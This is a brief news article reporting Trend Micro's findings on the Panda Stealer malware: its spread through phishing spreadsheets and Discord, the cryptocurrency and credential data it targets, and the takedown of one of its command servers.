A new type of malware, dubbed ‘Panda Stealer’ by researchers, is spreading through spam emails and malicious Discord links, and has its sights set firmly on your ever valuable cryptocurrency. According to Trend Micro (opens in new tab), the phishing emails appear as business quote requests, with an XLSM file attached that’s loaded with malign macros.
Panda Stealer appears as an innocent XLSM file with macros that once enabled download a "loader" which executes the main "stealer" application. Alternatively, an XLS file may be downloaded, containing a formula that hides a Powershell command that accesses paste.ee, a Pastebin alternative, to download a further PowerShell command. Once running, Panda Stealer tries to detect keys, addresses, and other data associated with cryptocurrency transactions and wallets holding funds including Dash, Bytecoin, Litecoin, and Ethereum. Right now we are unsure if the latest cryptocurrency, Chia is affected. It will also attempt to steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It’s capable of taking screenshots of the infected computer, and sucking data from browsers like cookies, passwords, and cards.
Panda Stealer seems to be a variant of Collector Stealer, a cracked build of which is freely available online. While there’s no evidence yet of a particular criminal group behind Panda Stealer, Trend Micro was able to identify an IP address being used by the malware for command and control. It led to a rented Shock Hosting virtual server, and having been reported, the server has been suspended.
This may not be enough to quell the threat, however, as VirusTotal found 264 similar files in its database, calling home to 140 C&C servers and from more than 10 download sites, some of them from Discord, which may be being used to share the malware between criminals.